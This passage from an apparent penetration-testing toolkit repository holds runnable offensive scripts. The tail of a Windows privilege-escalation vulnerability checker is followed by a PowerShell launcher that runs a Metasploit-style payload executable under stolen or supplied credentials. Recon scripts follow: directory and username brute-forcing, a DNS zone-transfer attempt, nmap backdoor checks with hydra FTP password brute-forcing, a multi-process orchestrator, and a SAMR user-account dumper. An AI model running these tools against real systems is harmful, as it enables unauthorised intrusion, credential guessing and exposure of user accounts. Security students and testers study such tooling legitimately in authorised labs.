$VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Minor -eq 10 -and $Build -le 3 -Or ( $Minor -eq 6 -and $Build -le 2 ) -Or ( $Minor -le 9 -and $Minor -ge 7 ) ] } # 6.6.2 - 6.10.3 522 | default { $VulnStatus = "Not Vulnerable" } 523 | 524 | } 525 | 526 | } 527 | 528 | Set-ExploitTable $CVEID $VulnStatus 529 | 530 | } 531 | 532 | function Find-MS16135 { 533 | 534 | $MSBulletin = "MS16-135" 535 | $Architecture = Get-Architecture 536 | 537 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) { 538 | 539 | $Path = $env:windir + "\system32\win32k.sys" 540 | 541 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) { 542 | 543 | $Path = $env:windir + "\sysnative\win32k.sys" 544 | 545 | } 546 | 547 | $VersionInfo = Get-FileVersionInfo($Path) 548 | $VersionInfo = $VersionInfo.Split(".") 549 | 550 | $Build = [int]$VersionInfo[2] 551 | $Revision = [int]$VersionInfo[3].Split(" ")[0] 552 | 553 | switch ( $Build ) { 554 | 555 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 23584 ] } 556 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 18524 ] } 557 | 10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 16384 ] } 558 | 10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 19 ] } 559 | 14393 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 446 ] } 560 | default { $VulnStatus = "Not Vulnerable" } 561 | 562 | } 563 | 564 | Set-ExploitTable $MSBulletin $VulnStatus 565 | 566 | } -------------------------------------------------------------------------------- /priv_escalation/Windows/elevate_privileges.ps1: -------------------------------------------------------------------------------- 1 | # Alternative to "su " or something like that in Windows boxes 2 | 3 | $secpasswd = ConvertTo-SecureString "" -AsPlainText -Force 4 | $mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) 5 | $computer = "" 6 | [System.Diagnostics.Process]::Start("C:\Users\public\msfpayload3.exe","", $mycreds.Username, $mycreds.Password, $computer) 7 | -------------------------------------------------------------------------------- /recon_scan/dirbust.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys 4 | import os 5 | import subprocess 6 | 7 | if len(sys.argv) != 3: 8 | print "Usage: dirbust.py " 9 | sys.exit(0) 10 | 11 | url = str(sys.argv[1]) 12 | name = str(sys.argv[2]) 13 | folders = ["/usr/share/dirb/wordlists", "/usr/share/dirb/wordlists/vulns"] 14 | 15 | found = [] 16 | print "INFO: Starting dirb scan for " + url 17 | for folder in folders: 18 | for filename in os.listdir(folder): 19 | 20 | outfile = " -o " + "results/exam/" + name + "_dirb_" + filename 21 | DIRBSCAN = "dirb %s %s/%s %s -S -r" % (url, folder, filename, outfile) 22 | try: 23 | results = subprocess.check_output(DIRBSCAN, shell=True) 24 | resultarr = results.split("\n") 25 | for line in resultarr: 26 | if "+" in line: 27 | if line not in found: 28 | found.append(line) 29 | except: 30 | pass 31 | 32 | try: 33 | if found[0] != "": 34 | print "[*] Dirb found the following items..." 35 | for item in found: 36 | print " " + item 37 | except: 38 | print "INFO: No items found during dirb scan of " + url 39 | -------------------------------------------------------------------------------- /recon_scan/dnsrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | 5 | if len(sys.argv) != 2: 6 | print "Usage: dnsrecon.py " 7 | sys.exit(0) 8 | 9 | ip_address = sys.argv[1] 10 | HOSTNAME = "nmblookup -A %s | grep '<00>' | grep -v '' | cut -d' ' -f1" % (ip_address)# grab the hostname 11 | host = subprocess.check_output(HOSTNAME, shell=True).strip() 12 | print "INFO: Attempting Domain Transfer on " + host 13 | ZT = "dig @%s.thinc.local thinc.local axfr" % (host) 14 | ztresults = subprocess.check_output(ZT, shell=True) 15 | if "failed" in ztresults: 16 | print "INFO: Zone Transfer failed for " + host 17 | else: 18 | print "[*] Zone Transfer successful for " + host + "(" + ip_address + ")!!! [see output file]" 19 | outfile = "results/exam/" + ip_address+ "_zonetransfer.txt" 20 | dnsf = open(outfile, "w") 21 | dnsf.write(ztresults) 22 | dnsf.close 23 | 24 | -------------------------------------------------------------------------------- /recon_scan/finger-user-enum.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # finger-user-enum - Brute Force Username via Finger Service 3 | # Copyright (C) 2006 pentestmonkey@pentestmonkey.net 4 | # 5 | # This program is free software; you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License version 2 as 7 | # published by the Free Software Foundation. 8 | # 9 | # This program is distributed in the hope that it will be useful, 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | # GNU General Public License for more details. 13 | # 14 | # You should have received a copy of the GNU General Public License along 15 | # with this program; if not, write to the Free Software Foundation, Inc., 16 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 17 | # 18 | # This tool may be used for legal purposes only. Users take full responsibility 19 | # for any actions performed using this tool. If these terms are not acceptable to 20 | # you, then do not use this tool. 21 | # 22 | # You are encouraged to send comments, improvements or suggestions to 23 | # me at finger-user-enum@pentestmonkey.net 24 | # 25 | # This program is derived from dns-grind v1.0 ( http://pentestmonkey.net/tools/dns-grind ) 26 | 27 | use strict; 28 | use Socket; 29 | use IO::Handle; 30 | use IO::Select; 31 | use IO::Socket::INET; 32 | use Getopt::Std; 33 | $| = 1; 34 | 35 | my $VERSION = "1.0"; 36 | my $debug = 0; 37 | my @child_handles = (); 38 | my $verbose = 0; 39 | my $max_procs = 5; 40 | my $finger_port = 79; 41 | my @usernames = (); 42 | my @hosts = (); 43 | my $recursive_flag = 1; 44 | my $relayserver = undef; 45 | my $query_timeout = 5; 46 | my $start_time = time(); 47 | my $end_time; 48 | my $kill_child_string = "\x00"; 49 | $SIG{CHLD} = 'IGNORE'; # auto-reap 50 | my %opts; 51 | my $usage=<; 119 | } 120 | 121 | if (defined($host_file)) { 122 | open(FILE, "<$host_file") or die "ERROR: Can't open username file $host_file: $!\n"; 123 | @hosts = map { chomp($_); $_ } ; 124 | } 125 | 126 | if (defined($username)) { 127 | push @usernames, $username; 128 | } 129 | 130 | if (defined($host)) { 131 | push @hosts, $host; 132 | } 133 | 134 | if (defined($host_file) and not @hosts) { 135 | print "ERROR: Targets file $host_file was empty\n"; 136 | exit 1; 137 | } 138 | 139 | if (defined($username_file) and not @usernames) { 140 | print "ERROR: Username file $username_file was empty\n"; 141 | exit 1; 142 | } 143 | 144 | print "Starting finger-user-enum v$VERSION ( http://pentestmonkey.net/tools/finger-user-enum )\n"; 145 | print "\n"; 146 | print " ----------------------------------------------------------\n"; 147 | print "| Scan Information |\n"; 148 | print " ----------------------------------------------------------\n"; 149 | print "\n"; 150 | print "Worker Processes ......... $max_procs\n"; 151 | print "Targets file ............. $host_file\n" if defined($host_file); 152 | print "Usernames file ........... $username_file\n" if defined($username_file); 153 | print "Target count ............. " . scalar(@hosts) . "\n" if @hosts; 154 | print "Username count ........... " . scalar(@usernames) . "\n" if @usernames; 155 | print "Target TCP port .......... $finger_port\n"; 156 | print "Query timeout ............ $query_timeout secs\n"; 157 | if (defined($relayserver)) { 158 | print "Relay Server ............. $relayserver\n"; 159 | } else { 160 | print "Relay Server ............. Not used\n"; 161 | } 162 | print "\n"; 163 | print "######## Scan started at " . scalar(localtime()) . " #########\n"; 164 | 165 | # Spawn off correct number of children 166 | foreach my $proc_count (1..$max_procs) { 167 | socketpair(my $child, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!"; 168 | $child->autoflush(1); 169 | $parent->autoflush(1); 170 | 171 | # Parent executes this 172 | if (my $pid = fork) { 173 | close $parent; 174 | print "[Parent] Spawned child with PID $pid to do resolving\n" if $debug; 175 | push @child_handles, $child; 176 | 177 | # Chile executes this 178 | } else { 179 | close $child; 180 | while (1) { 181 | my $timed_out = 0; 182 | 183 | # Read host and username from parent 184 | my $line = <$parent>; 185 | chomp($line); 186 | my ($host, $username) = $line =~ /^(\S+)\t(.*)$/; 187 | 188 | # Exit if told to by parent 189 | if ($line eq $kill_child_string) { 190 | print "[Child $$] Exiting\n" if $debug; 191 | exit 0; 192 | } 193 | 194 | # Sanity check host and username 195 | if (defined($host) and defined($username)) { 196 | print "[Child $$] Passed host $host and username $username\n" if $debug; 197 | } else { 198 | print "[Child $$] WARNING: Passed garbage. Ignoring: $line\n"; 199 | next; 200 | } 201 | 202 | # Do finger query with timeout 203 | my $response; 204 | eval { 205 | local $SIG{ALRM} = sub { die "alarm\n" }; 206 | alarm $query_timeout; 207 | my $connect_host; 208 | if (defined($relayserver)) { 209 | $connect_host = $relayserver; 210 | } else { 211 | $connect_host = $host; 212 | } 213 | my $s = IO::Socket::INET->new( PeerAddr => $connect_host, 214 | PeerPort => $finger_port, 215 | Proto => 'tcp' 216 | ) 217 | or die "Can't connect to $host:$finger_port: $!\n"; 218 | if (defined($relayserver)) { 219 | $s->send($username . "@" . "$host\r\n"); 220 | } else { 221 | $s->send("$username\r\n"); 222 | } 223 | $s->recv($response, 10000); 224 | alarm 0; 225 | }; 226 | 227 | if ($@) { 228 | $timed_out = 1; 229 | print "[Child $$] Timeout for username $username on host $host\n" if $debug; 230 | } 231 | 232 | my $trace; 233 | if ($debug) { 234 | $trace = "[Child $$] $username\@$host: "; 235 | } else { 236 | $trace = "$username\@$host: "; 237 | } 238 | 239 | if ($response and not $timed_out) { 240 | 241 | # Negative result against solaris 7 242 | # 243 | # blah@10.0.0.1 Login Name TTY Idle When Where 244 | # blah ??? 245 | if ($response =~ /Login\s+Name\s+TTY\s+Idle\s+When\s+Where.*$username\s+\?\?\?[^<>]+$/s) { 246 | print $parent $trace . "\n"; 247 | next; 248 | } 249 | 250 | # Negative result for unknow finger daemon 251 | # It just returns a single "f" - presumably for "false" 252 | if ($response =~ /\s*f\s*$/) { 253 | print $parent $trace . "\n"; 254 | next; 255 | } 256 | 257 | # 258 | # Positive result against solaris 7 259 | # 260 | # if ($response =~ /^Login\s+Name\s+TTY\s+Idle\s+When\s+Where.*($username\s+[^?].*)/s) { 261 | # if ($response =~ /Login\s+Name\s+TTY\s+Idle\s+When\s+Where.*($username.*<.*>.*)/s) { 262 | if ($response =~ /Login\s+Name\s+TTY\s+Idle\s+When\s+Where.*($username.*)/s) { 263 | my $username_info = $1; 264 | $username_info =~ s/[\r\n]/./g; # Reduce to a single line 265 | print $parent $trace . "$username_info\n"; 266 | next; 267 | } 268 | 269 | # Assume a positive response if we don't recognise the format 270 | $response =~ s/[\n\r]/./g; 271 | print $parent $trace . "$response\n"; 272 | next; 273 | } 274 | 275 | if ($timed_out) { 276 | print $parent $trace . "\n"; 277 | } else { 278 | if (!$response) { 279 | print $parent $trace . "\n"; 280 | } 281 | } 282 | } 283 | exit; 284 | } 285 | } 286 | 287 | # Fork once more to make a process that will us usernames and hosts 288 | socketpair(my $get_next_query, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!"; 289 | $get_next_query->autoflush(1); 290 | $parent->autoflush(1); 291 | 292 | # Parent executes this 293 | if (my $pid = fork) { 294 | close $parent; 295 | 296 | # Chile executes this 297 | } else { 298 | # Generate queries from username-host pairs and send to parent 299 | foreach my $username (@usernames) { 300 | foreach my $host (@hosts) { 301 | my $query = $host . "\t" . $username; 302 | print "[Query Generator] Sending $query to parent\n" if $debug; 303 | print $parent "$query\n"; 304 | } 305 | } 306 | 307 | exit 0; 308 | } 309 | 310 | printf "Created %d child processes\n", scalar(@child_handles) if $debug; 311 | my $s = IO::Select->new(); 312 | my $s_in = IO::Select->new(); 313 | $s->add(@child_handles); 314 | $s_in->add(\*STDIN); 315 | my $timeout = 0; # non-blocking 316 | my $more_queries = 1; 317 | my $outstanding_queries = 0; 318 | my $query_count = 0; 319 | my $result_count = 0; 320 | 321 | # Write to each child process once 322 | writeloop: foreach my $write_handle (@child_handles) { 323 | my $query = <$get_next_query>; 324 | if ($query) { 325 | chomp($query); 326 | print "[Parent] Sending $query to child\n" if $debug; 327 | print $write_handle "$query\n"; 328 | $outstanding_queries++; 329 | } else { 330 | print "[Parent] Quitting main loop. All queries have been read.\n" if $debug; 331 | last writeloop; 332 | } 333 | } 334 | 335 | # Keep reading from child processes until there are no more queries left 336 | # Write to a child only after it has been read from 337 | mainloop: while (1) { 338 | # Wait until there's a child that we can either read from or written to. 339 | my ($rh_aref) = IO::Select->select($s, undef, undef); # blocking 340 | 341 | print "[Parent] There are " . scalar(@$rh_aref) . " children that can be read from\n" if $debug; 342 | 343 | foreach my $read_handle (@$rh_aref) { 344 | # Read from child 345 | chomp(my $line = <$read_handle>); 346 | if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) { 347 | print "$line\n"; 348 | $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //); 349 | } 350 | $outstanding_queries--; 351 | $query_count++; 352 | 353 | # Write to child 354 | my $query = <$get_next_query>; 355 | if ($query) { 356 | chomp($query); 357 | print "[Parent] Sending $query to child\n" if $debug; 358 | print $read_handle "$query\n"; 359 | $outstanding_queries++; 360 | } else { 361 | print "DEBUG: Quitting main loop. All queries have been read.\n" if $debug; 362 | last mainloop; 363 | } 364 | } 365 | } 366 | 367 | # Wait to get replies back from remaining children 368 | my $count = 0; 369 | readloop: while ($outstanding_queries) { 370 | my @ready_to_read = $s->can_read(1); # blocking 371 | foreach my $child_handle (@ready_to_read) { 372 | print "[Parent] Outstanding queries: $outstanding_queries\n" if $debug; 373 | chomp(my $line = <$child_handle>); 374 | if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) { 375 | print "$line\n"; 376 | $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //); 377 | } 378 | print $child_handle "$kill_child_string\n"; 379 | $s->remove($child_handle); 380 | $outstanding_queries--; 381 | $query_count++; 382 | } 383 | } 384 | 385 | # Tell any remaining children to exit 386 | foreach my $handle ($s->handles) { 387 | print "[Parent] Telling child to exit\n" if $debug; 388 | print $handle "$kill_child_string\n"; 389 | } 390 | 391 | # Wait for all children to terminate 392 | while(wait != -1) {}; 393 | 394 | print "######## Scan completed at " . scalar(localtime()) . " #########\n"; 395 | print "$result_count results.\n"; 396 | print "\n"; 397 | $end_time = time(); # Second granularity only to avoid depending on hires time module 398 | my $run_time = $end_time - $start_time; 399 | $run_time = 1 if $run_time < 1; # Avoid divide by zero 400 | printf "%d queries in %d seconds (%0.1f queries / sec)\n", $query_count, $run_time, $query_count / $run_time; 401 | -------------------------------------------------------------------------------- /recon_scan/ftprecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | import os 5 | 6 | if len(sys.argv) != 3: 7 | print "Usage: ftprecon.py " 8 | sys.exit(0) 9 | 10 | ip_address = sys.argv[1].strip() 11 | port = sys.argv[2].strip() 12 | print "INFO: Performing nmap FTP script scan for " + ip_address + ":" + port 13 | FTPSCAN = "nmap -sV -Pn -vv -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '/root/scripts/recon_enum/results/exam/%s_ftp.nmap' %s" % (port, ip_address, ip_address) 14 | results = subprocess.check_output(FTPSCAN, shell=True) 15 | outfile = "results/exam/" + ip_address + "_ftprecon.txt" 16 | f = open(outfile, "w") 17 | f.write(results) 18 | f.close 19 | 20 | print "INFO: Performing hydra ftp scan against " + ip_address 21 | HYDRA = "hydra -L wordlists/userlist -P wordlists/offsecpass -f -o results/%s_ftphydra.txt -u %s -s %s ftp" % (ip_address, ip_address, port) 22 | results = subprocess.check_output(HYDRA, shell=True) 23 | resultarr = results.split("\n") 24 | for result in resultarr: 25 | if "login:" in result: 26 | print "[*] Valid ftp credentials found: " + result 27 | -------------------------------------------------------------------------------- /recon_scan/readme.txt: -------------------------------------------------------------------------------- 1 | This readme file pertains to the reconscan.py script and all associated scripts. 2 | 3 | Currently these scripts include: 4 | reconscan.py (main) 5 | dirbust.py 6 | dnsrecon.py 7 | ftprecon.py 8 | reconscan.py 9 | smbrecon.py 10 | smtprecon.py 11 | snmprecon.py 12 | sshrecon.py 13 | 14 | This collection of scripts is intended to be executed remotely against a list of IPs to enumerate discovered 15 | services such as smb, smtp, snmp, ftp and other. 16 | 17 | Author: 18 | Mike Czumak (T_v3rn1x) -- @SecuritySift 19 | 20 | How to use: 21 | reconscan.py is the main script which calls all other scripts. Simply run it and it should do the work for you. 22 | Since I wrote this for a very specific use case I hard-coded all paths so be sure you change them accordingly. 23 | You'll also need to check the directories used for writing and modify accordingly as well. I intentionally kept 24 | these scripts modular so that each script could also be run on its own. 25 | 26 | Warning: 27 | These scripts comes as-is with no promise of functionality or accuracy. I strictly wrote them for personal use 28 | I have no plans to maintain updates, I did not write them to be efficient and in some cases you may find the 29 | functions may not produce the desired results so use at your own risk/discretion. I wrote these scripts to 30 | target machines in a lab environment so please only use them against systems for which you have permission!! 31 | 32 | Modification, Distribution, and Attribution: 33 | You are free to modify and/or distribute this script as you wish. I only ask that you maintain original 34 | author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's 35 | worth anything anyway :) 36 | 37 | -------------------------------------------------------------------------------- /recon_scan/reconscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ############################################################################################################### 4 | ## [Title]: reconscan.py -- a recon/enumeration script 5 | ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift 6 | ##------------------------------------------------------------------------------------------------------------- 7 | ## [Details]: 8 | ## This script is intended to be executed remotely against a list of IPs to enumerate discovered services such 9 | ## as smb, smtp, snmp, ftp and other. 10 | ##------------------------------------------------------------------------------------------------------------- 11 | ## [Warning]: 12 | ## This script comes as-is with no promise of functionality or accuracy. I strictly wrote it for personal use 13 | ## I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the 14 | ## functions may not produce the desired results so use at your own risk/discretion. I wrote this script to 15 | ## target machines in a lab environment so please only use it against systems for which you have permission!! 16 | ##------------------------------------------------------------------------------------------------------------- 17 | ## [Modification, Distribution, and Attribution]: 18 | ## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original 19 | ## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's 20 | ## worth anything anyway :) 21 | ############################################################################################################### 22 | 23 | import subprocess 24 | import multiprocessing 25 | from multiprocessing import Process, Queue 26 | import os 27 | import time 28 | 29 | def multProc(targetin, scanip, port): 30 | jobs = [] 31 | p = multiprocessing.Process(target=targetin, args=(scanip,port)) 32 | jobs.append(p) 33 | p.start() 34 | return 35 | 36 | 37 | def dnsEnum(ip_address, port): 38 | print "INFO: Detected DNS on " + ip_address + ":" + port 39 | if port.strip() == "53": 40 | SCRIPT = "./dnsrecon.py %s" % (ip_address)# execute the python script 41 | subprocess.call(SCRIPT, shell=True) 42 | return 43 | 44 | def httpEnum(ip_address, port): 45 | print "INFO: Detected http on " + ip_address + ":" + port 46 | print "INFO: Performing nmap web script scan for " + ip_address + ":" + port 47 | HTTPSCAN = "nmap -sV -Pn -vv -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-email-harvest,http-methods,http-method-tamper,http-passwd,http-robots.txt -oN /root/scripts/recon_enum/results/exam/%s_http.nmap %s" % (port, ip_address, ip_address) 48 | results = subprocess.check_output(HTTPSCAN, shell=True) 49 | DIRBUST = "./dirbust.py http://%s:%s %s" % (ip_address, port, ip_address) # execute the python script 50 | subprocess.call(DIRBUST, shell=True) 51 | #NIKTOSCAN = "nikto -host %s -p %s > %s._nikto" % (ip_address, port, ip_address) 52 | return 53 | 54 | def httpsEnum(ip_address, port): 55 | print "INFO: Detected https on " + ip_address + ":" + port 56 | print "INFO: Performing nmap web script scan for " + ip_address + ":" + port 57 | HTTPSCANS = "nmap -sV -Pn -vv -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-email-harvest,http-methods,http-method-tamper,http-passwd,http-robots.txt -oX /root/scripts/recon_enum/results/exam/%s_https.nmap %s" % (port, ip_address, ip_address) 58 | results = subprocess.check_output(HTTPSCANS, shell=True) 59 | DIRBUST = "./dirbust.py https://%s:%s %s" % (ip_address, port, ip_address) # execute the python script 60 | subprocess.call(DIRBUST, shell=True) 61 | #NIKTOSCAN = "nikto -host %s -p %s > %s._nikto" % (ip_address, port, ip_address) 62 | return 63 | 64 | def mssqlEnum(ip_address, port): 65 | print "INFO: Detected MS-SQL on " + ip_address + ":" + port 66 | print "INFO: Performing nmap mssql script scan for " + ip_address + ":" + port 67 | MSSQLSCAN = "nmap -vv -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=1433,smsql.username-sa,mssql.password-sa -oX results/exam/nmap/%s_mssql.xml %s" % (port, ip_address, ip_address) 68 | results = subprocess.check_output(MSSQLSCAN, shell=True) 69 | 70 | def sshEnum(ip_address, port): 71 | print "INFO: Detected SSH on " + ip_address + ":" + port 72 | SCRIPT = "./sshrecon.py %s %s" % (ip_address, port) 73 | subprocess.call(SCRIPT, shell=True) 74 | return 75 | 76 | def snmpEnum(ip_address, port): 77 | print "INFO: Detected snmp on " + ip_address + ":" + port 78 | SCRIPT = "./snmprecon.py %s" % (ip_address) 79 | subprocess.call(SCRIPT, shell=True) 80 | return 81 | 82 | def smtpEnum(ip_address, port): 83 | print "INFO: Detected smtp on " + ip_address + ":" + port 84 | if port.strip() == "25": 85 | SCRIPT = "./smtprecon.py %s" % (ip_address) 86 | subprocess.call(SCRIPT, shell=True) 87 | else: 88 | print "WARNING: SMTP detected on non-standard port, smtprecon skipped (must run manually)" 89 | return 90 | 91 | def smbEnum(ip_address, port): 92 | print "INFO: Detected SMB on " + ip_address + ":" + port 93 | if port.strip() == "445": 94 | SCRIPT = "./smbrecon.py %s 2>/dev/null" % (ip_address) 95 | subprocess.call(SCRIPT, shell=True) 96 | return 97 | 98 | def ftpEnum(ip_address, port): 99 | print "INFO: Detected ftp on " + ip_address + ":" + port 100 | SCRIPT = "./ftprecon.py %s %s" % (ip_address, port) 101 | subprocess.call(SCRIPT, shell=True) 102 | return 103 | 104 | def nmapScan(ip_address): 105 | ip_address = ip_address.strip() 106 | print "INFO: Running general TCP/UDP nmap scans for " + ip_address 107 | serv_dict = {} 108 | TCPSCAN = "nmap -vv -Pn -A -sC -sS -T 4 -p- -oN '/root/scripts/recon_enum/results/exam/%s.nmap' -oX '/root/scripts/recon_enum/results/exam/nmap/%s_nmap_scan_import.xml' %s" % (ip_address, ip_address, ip_address) 109 | UDPSCAN = "nmap -vv -Pn -A -sC -sU -T 4 --top-ports 200 -oN '/root/scripts/recon_enum/results/exam/%sU.nmap' -oX '/root/scripts/recon_enum/results/exam/nmap/%sU_nmap_scan_import.xml' %s" % (ip_address, ip_address, ip_address) 110 | results = subprocess.check_output(TCPSCAN, shell=True) 111 | udpresults = subprocess.check_output(UDPSCAN, shell=True) 112 | lines = results.split("\n") 113 | for line in lines: 114 | ports = [] 115 | line = line.strip() 116 | if ("tcp" in line) and ("open" in line) and not ("Discovered" in line): 117 | while " " in line: 118 | line = line.replace(" ", " "); 119 | linesplit= line.split(" ") 120 | service = linesplit[2] # grab the service name 121 | port = line.split(" ")[0] # grab the port/proto 122 | if service in serv_dict: 123 | ports = serv_dict[service] # if the service is already in the dict, grab the port list 124 | 125 | ports.append(port) 126 | serv_dict[service] = ports # add service to the dictionary along with the associated port(2) 127 | 128 | # go through the service dictionary to call additional targeted enumeration functions 129 | for serv in serv_dict: 130 | ports = serv_dict[serv] 131 | if (serv == "http"): 132 | for port in ports: 133 | port = port.split("/")[0] 134 | multProc(httpEnum, ip_address, port) 135 | elif (serv == "ssl/http") or ("https" in serv): 136 | for port in ports: 137 | port = port.split("/")[0] 138 | multProc(httpsEnum, ip_address, port) 139 | elif "ssh" in serv: 140 | for port in ports: 141 | port = port.split("/")[0] 142 | multProc(sshEnum, ip_address, port) 143 | elif "smtp" in serv: 144 | for port in ports: 145 | port = port.split("/")[0] 146 | multProc(smtpEnum, ip_address, port) 147 | elif "snmp" in serv: 148 | for port in ports: 149 | port = port.split("/")[0] 150 | multProc(snmpEnum, ip_address, port) 151 | elif ("domain" in serv): 152 | for port in ports: 153 | port = port.split("/")[0] 154 | multProc(dnsEnum, ip_address, port) 155 | elif ("ftp" in serv): 156 | for port in ports: 157 | port = port.split("/")[0] 158 | multProc(ftpEnum, ip_address, port) 159 | elif "microsoft-ds" in serv: 160 | for port in ports: 161 | port = port.split("/")[0] 162 | multProc(smbEnum, ip_address, port) 163 | elif "ms-sql" in serv: 164 | for port in ports: 165 | port = port.split("/")[0] 166 | multProc(httpEnum, ip_address, port) 167 | 168 | print "INFO: TCP/UDP Nmap scans completed for " + ip_address 169 | return 170 | 171 | # grab the discover scan results and start scanning up hosts 172 | print "############################################################" 173 | print "#### RECON SCAN ####" 174 | print "#### A multi-process service scanner ####" 175 | print "#### http, ftp, dns, ssh, snmp, smtp, ms-sql ####" 176 | print "############################################################" 177 | 178 | if __name__=='__main__': 179 | f = open('results/exam/targets.txt', 'r') # CHANGE THIS!! grab the alive hosts from the discovery scan for enum 180 | for scanip in f: 181 | jobs = [] 182 | p = multiprocessing.Process(target=nmapScan, args=(scanip,)) 183 | jobs.append(p) 184 | p.start() 185 | f.close() 186 | -------------------------------------------------------------------------------- /recon_scan/samrdump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2.7 2 | # Copyright (c) 2003-2012 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # $Id: samrdump.py 592 2012-07-11 16:45:20Z bethus@gmail.com $ 9 | # 10 | # Description: DCE/RPC SAMR dumper. 11 | # 12 | # Author: 13 | # Javier Kohen 14 | # Alberto Solino 15 | # 16 | # Reference for: 17 | # DCE/RPC for SAMR 18 | 19 | import socket 20 | import string 21 | import sys 22 | import types 23 | 24 | from impacket import uuid, version 25 | from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr 26 | import argparse 27 | 28 | 29 | class ListUsersException(Exception): 30 | pass 31 | 32 | class SAMRDump: 33 | KNOWN_PROTOCOLS = { 34 | '139/SMB': (r'ncacn_np:%s[\pipe\samr]', 139), 35 | '445/SMB': (r'ncacn_np:%s[\pipe\samr]', 445), 36 | } 37 | 38 | 39 | def __init__(self, protocols = None, 40 | username = '', password = '', domain = '', hashes = None): 41 | if not protocols: 42 | protocols = SAMRDump.KNOWN_PROTOCOLS.keys() 43 | 44 | self.__username = username 45 | self.__password = password 46 | self.__domain = domain 47 | self.__protocols = [protocols] 48 | self.__lmhash = '' 49 | self.__nthash = '' 50 | if hashes is not None: 51 | self.__lmhash, self.__nthash = hashes.split(':') 52 | 53 | 54 | def dump(self, addr): 55 | """Dumps the list of users and shares registered present at 56 | addr. Addr is a valid host name or IP address. 57 | """ 58 | 59 | encoding = sys.getdefaultencoding() 60 | 61 | print 'Retrieving endpoint list from %s' % addr 62 | 63 | # Try all requested protocols until one works. 64 | entries = [] 65 | for protocol in self.__protocols: 66 | protodef = SAMRDump.KNOWN_PROTOCOLS[protocol] 67 | port = protodef[1] 68 | 69 | print "Trying protocol %s..." % protocol 70 | rpctransport = transport.SMBTransport(addr, port, r'\samr', self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) 71 | 72 | try: 73 | entries = self.__fetchList(rpctransport) 74 | except Exception, e: 75 | print 'Protocol failed: %s' % e 76 | raise 77 | else: 78 | # Got a response. No need for further iterations. 79 | break 80 | 81 | 82 | # Display results. 83 | 84 | for entry in entries: 85 | (username, uid, user) = entry 86 | base = "%s (%d)" % (username, uid) 87 | print base + '/Enabled:', ('false', 'true')[user.is_enabled()] 88 | print base + '/Last Logon:', user.get_logon_time() 89 | print base + '/Last Logoff:', user.get_logoff_time() 90 | print base + '/Kickoff:', user.get_kickoff_time() 91 | print base + '/Last PWD Set:', user.get_pwd_last_set() 92 | print base + '/PWD Can Change:', user.get_pwd_can_change() 93 | print base + '/PWD Must Change:', user.get_pwd_must_change() 94 | print base + '/Group id: %d' % user.get_group_id() 95 | print base + '/Bad pwd count: %d' % user.get_bad_pwd_count() 96 | print base + '/Logon count: %d' % user.get_logon_count() 97 | items = user.get_items() 98 | for i in samr.MSRPCUserInfo.ITEMS.keys(): 99 | name = items[samr.MSRPCUserInfo.ITEMS[i]].get_name() 100 | name = name.encode(encoding, 'replace') 101 | print base + '/' + i + ':', name 102 | 103 | if entries: 104 | num = len(entries) 105 | if 1 == num: 106 | print 'Received one entry.' 107 | else: 108 | print 'Received %d entries.' % num 109 | else: 110 | print 'No entries received.' 111 | 112 | 113 | def __fetchList(self, rpctransport): 114 | dce = dcerpc.DCERPC_v5(rpctransport) 115 | 116 | encoding = sys.getdefaultencoding() 117 | entries = [] 118 | 119 | dce.connect() 120 | dce.bind(samr.MSRPC_UUID_SAMR) 121 | rpcsamr = samr.DCERPCSamr(dce) 122 | 123 | try: 124 | resp = rpcsamr.connect() 125 | if resp.get_return_code() != 0: 126 | raise ListUsersException, 'Connect error' 127 | 128 | _context_handle = resp.get_context_handle() 129 | resp = rpcsamr.enumdomains(_context_handle) 130 | if resp.get_return_code() != 0: 131 | raise ListUsersException, 'EnumDomain error' 132 | 133 